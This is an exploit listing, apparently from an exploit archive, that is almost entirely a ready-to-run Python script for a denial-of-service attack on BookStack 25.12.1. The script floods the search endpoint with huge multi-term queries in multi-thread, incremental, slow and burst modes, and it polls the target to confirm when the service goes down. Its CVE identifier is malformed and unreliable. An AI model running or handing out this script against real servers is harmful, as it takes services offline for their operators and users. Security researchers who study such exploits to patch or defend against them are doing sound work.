Share
## https://sploitus.com/exploit?id=PACKETSTORM:223563
==================================================================================================================================
| # Title : BookStack 25.12.1 Denial of Service via Search Term Resource Exhaustion |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.bookstackapp.com |
==================================================================================================================================
[+] Summary : This script a denial of service condition against a BookStack search endpoint by generating extremely large search queries and sending them with high levels of concurrency.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import time
import argparse
import threading
import urllib3
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BookStackDoS:
def __init__(self, target_url, cookie=None, verbose=False):
self.base_url = target_url.rstrip('/')
self.cookie = cookie
self.verbose = verbose
self.search_url = f"{self.base_url}/search"
self.stop_attack = threading.Event()
self.session = requests.Session()
if cookie:
self.session.headers['Cookie'] = cookie
self.request_count = 0
self.error_count = 0
self.lock = threading.Lock()
def log(self, msg, level="INFO"):
timestamp = datetime.now().strftime("%H:%M:%S")
if level == "SUCCESS":
print(f"\033[92m[{timestamp}] [+] {msg}\033[0m")
elif level == "ERROR":
print(f"\033[91m[{timestamp}] [-] {msg}\033[0m")
elif level == "WARNING":
print(f"\033[93m[{timestamp}] [!] {msg}\033[0m")
elif level == "DEBUG" and self.verbose:
print(f"\033[94m[{timestamp}] [*] {msg}\033[0m")
else:
print(f"\033[96m[{timestamp}] [*] {msg}\033[0m")
def generate_search_payload(self, generic_terms=100, exact_terms=50, tag_terms=30):
"""Generate massive search payload to exhaust database"""
generic = [f"t{i}" for i in range(generic_terms)]
exact = [f"\"e{i}\"" for i in range(exact_terms)]
tags = [f"[t{i}=v{i}]" for i in range(tag_terms)]
all_terms = generic + exact + tags
return " ".join(all_terms)
def generate_max_payload(self):
"""Generate maximum size payload (most destructive)"""
return self.generate_search_payload(200, 100, 50)
def generate_moderate_payload(self):
"""Generate moderate payload (80% of max)"""
return self.generate_search_payload(100, 50, 30)
def generate_light_payload(self):
"""Generate light payload for testing"""
return self.generate_search_payload(30, 15, 10)
def get_search_term_count(self, payload):
"""Count number of search terms in payload"""
return len(payload.split())
def check_service_status(self):
"""Check if BookStack service is responding"""
try:
response = self.session.get(self.base_url, timeout=5)
return response.status_code == 200
except:
return False
def send_search_request(self, payload, timeout=30):
"""Send a single search request with the payload"""
encoded_payload = quote(payload)
url = f"{self.search_url}?term={encoded_payload}"
try:
response = self.session.get(url, timeout=timeout)
with self.lock:
self.request_count += 1
if self.verbose:
self.log(f"Request completed: HTTP {response.status_code}", "DEBUG")
return response
except requests.exceptions.Timeout:
with self.lock:
self.error_count += 1
self.log(f"Request timeout", "DEBUG")
return None
except Exception as e:
with self.lock:
self.error_count += 1
self.log(f"Request error: {e}", "DEBUG")
return None
def single_request_attack(self, payload_size="max"):
"""Simple single request attack"""
if payload_size == "max":
payload = self.generate_max_payload()
elif payload_size == "moderate":
payload = self.generate_moderate_payload()
else:
payload = self.generate_light_payload()
term_count = self.get_search_term_count(payload)
self.log(f"Sending single search request with {term_count} terms", "WARNING")
self.log(f"Payload preview: {payload[:200]}...", "DEBUG")
url_length = len(self.search_url) + len(payload) + 10
self.log(f"Request URL length: {url_length} bytes")
start_time = time.time()
response = self.send_search_request(payload, timeout=60)
elapsed = time.time() - start_time
if response:
self.log(f"Request completed in {elapsed:.2f}s with HTTP {response.status_code}")
else:
self.log(f"Request failed or timed out after {elapsed:.2f}s")
def multi_thread_attack(self, threads=150, duration=30, payload_size="moderate"):
"""Multi-threaded attack to exhaust resources"""
if payload_size == "max":
payload = self.generate_max_payload()
else:
payload = self.generate_moderate_payload()
term_count = self.get_search_term_count(payload)
self.log(f"Starting multi-thread attack with {threads} threads for {duration}s")
self.log(f"Each request contains {term_count} search terms")
self.request_count = 0
self.error_count = 0
self.stop_attack.clear()
def worker():
while not self.stop_attack.is_set():
self.send_search_request(payload, timeout=30)
time.sleep(0.01)
workers = []
for _ in range(threads):
t = threading.Thread(target=worker, daemon=True)
t.start()
workers.append(t)
start_time = time.time()
last_healthy_check = time.time()
service_crashed = False
while time.time() - start_time < duration:
time.sleep(2)
elapsed = int(time.time() - start_time)
if time.time() - last_healthy_check >= 5:
if self.check_service_status():
self.log(f"[{elapsed}s] Service ONLINE - Requests: {self.request_count}, Errors: {self.error_count}")
else:
self.log(f"[{elapsed}s] Service OFFLINE! - DOS Successful!", "SUCCESS")
service_crashed = True
break
last_healthy_check = time.time()
else:
self.log(f"[{elapsed}s] Attack ongoing - {self.request_count} requests sent", "INFO")
self.stop_attack.set()
for t in workers:
t.join(timeout=2)
self.log(f"Attack completed: {self.request_count} requests, {self.error_count} errors")
time.sleep(5)
if self.check_service_status():
if service_crashed:
self.log("Service recovered after attack", "WARNING")
else:
self.log("Service remained online throughout attack", "ERROR")
else:
self.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
def incremental_attack(self, start_threads=10, max_threads=200, increment=20, duration_per_phase=10):
"""Gradually increase attack intensity to find threshold"""
self.log("Starting incremental attack to find DoS threshold")
self.log(f"Threads: {start_threads} -> {max_threads} (increment: {increment})")
for threads in range(start_threads, max_threads + 1, increment):
self.log(f"\n--- Phase: {threads} threads ---")
payload = self.generate_moderate_payload()
self.request_count = 0
self.error_count = 0
self.stop_attack.clear()
workers = []
for _ in range(threads):
t = threading.Thread(
target=self.send_search_request,
args=(payload,),
daemon=True
)
t.start()
workers.append(t)
start_time = time.time()
crashed = False
while time.time() - start_time < duration_per_phase:
time.sleep(1)
if not self.check_service_status():
self.log(f"Service crashed at {threads} threads!", "SUCCESS")
crashed = True
break
self.stop_attack.set()
for t in workers:
t.join(timeout=1)
if crashed:
self.log(f"DoS threshold found: {threads} threads")
break
else:
self.log(f"Service survived {threads} threads")
time.sleep(5)
def slow_loris_attack(self, duration=60, interval=0.5):
"""Slow attack that gradually exhausts resources"""
self.log(f"Starting Slow Loris style attack for {duration} seconds")
payload = self.generate_moderate_payload()
start_time = time.time()
request_count = 0
while time.time() - start_time < duration:
# Send request with delay
self.send_search_request(payload, timeout=10)
request_count += 1
if request_count % 10 == 0:
self.log(f"Sent {request_count} slow requests")
if not self.check_service_status():
self.log("Service crashed during slow attack!", "SUCCESS")
break
time.sleep(interval)
self.log(f"Slow attack completed: {request_count} requests")
def massive_burst_attack(self, burst_size=500):
"""Send massive burst of simultaneous requests"""
self.log(f"Starting massive burst attack with {burst_size} simultaneous requests")
payload = self.generate_moderate_payload()
with ThreadPoolExecutor(max_workers=burst_size) as executor:
futures = [executor.submit(self.send_search_request, payload) for _ in range(burst_size)]
completed = 0
for future in as_completed(futures):
completed += 1
if completed % 50 == 0:
self.log(f"Completed {completed}/{burst_size} requests")
self.log(f"Burst completed: {self.request_count} successful, {self.error_count} errors")
time.sleep(3)
if self.check_service_status():
self.log("Service survived burst attack", "WARNING")
else:
self.log("Service crashed from burst attack!", "SUCCESS")
def banner():
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ BookStack 25.12.1 - Denial of Service (Search Term Exhaustion) โ
โ Resource Exhaustion via Massive Search Queries โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
def main():
parser = argparse.ArgumentParser(
description="CVE-1970573 - BookStack DoS via Search Term Resource Exhaustion"
)
parser.add_argument("-u", "--url", required=True, help="Target BookStack URL")
parser.add_argument("-c", "--cookie", help="Cookie for authenticated requests")
parser.add_argument("-t", "--threads", type=int, default=150, help="Number of threads (default: 150)")
parser.add_argument("-d", "--duration", type=int, default=30, help="Attack duration in seconds (default: 30)")
parser.add_argument("-m", "--mode", choices=["single", "multi", "incremental", "slow", "burst"],
default="multi", help="Attack mode (default: multi)")
parser.add_argument("-p", "--payload", choices=["light", "moderate", "max"],
default="moderate", help="Payload size (default: moderate)")
parser.add_argument("--monitor", action="store_true", help="Monitor service status only")
parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
args = parser.parse_args()
banner()
exploit = BookStackDoS(args.url, args.cookie, args.verbose)
if args.monitor:
exploit.log("Monitoring service status...")
while True:
if exploit.check_service_status():
exploit.log("Service ONLINE")
else:
exploit.log("Service OFFLINE", "ERROR")
time.sleep(5)
return
if not exploit.check_service_status():
exploit.log("Service is not responding. Check URL and network.", "ERROR")
return
exploit.log(f"Target: {args.url}")
exploit.log(f"Service is ONLINE, starting attack...")
if args.mode == "single":
exploit.single_request_attack(args.payload)
elif args.mode == "multi":
threads = args.threads
duration = args.duration
exploit.multi_thread_attack(threads, duration, args.payload)
elif args.mode == "incremental":
exploit.incremental_attack()
elif args.mode == "slow":
exploit.slow_loris_attack(args.duration)
elif args.mode == "burst":
exploit.massive_burst_attack(args.threads)
time.sleep(5)
if exploit.check_service_status():
exploit.log("Service still responding after attack", "WARNING")
else:
exploit.log("Service is DOWN! Denial of Service successful!", "SUCCESS")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[!] Interrupted by user")
sys.exit(0)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================